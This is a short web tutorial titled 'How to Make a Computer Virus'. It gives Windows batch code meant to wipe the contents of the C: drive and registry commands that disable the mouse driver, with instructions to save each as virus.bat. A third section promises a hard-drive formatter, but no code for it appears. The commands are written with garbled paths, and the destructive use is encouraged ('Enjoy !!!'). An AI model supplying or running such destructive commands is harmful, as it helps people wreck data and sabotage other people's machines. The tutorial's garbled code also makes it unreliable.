How to Make a Computer Virus

How to Make a Computer Virus

Virus that format C: Drive:

 1. Open Notepad and copy below code into it.

                 @Echo off
                 Del C: *.* |y
  2. Save this file as virus.bat (Name can be anything but .bat is must) 

  3. Now, running this file will delete all the content of C Drive.

Virus that Disable Mouse:

  • Open Notepad and copy below codes
rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————
  • Save this file as  virus.bat
  • Done you just created your virus.

Virus that create binary virus to format HARDDIsK:

   1. Copy the below codes into Notepad.

   2. Save the file as Format.exe
   3. You just created virus to format Hard Drive. Enjoy !!!


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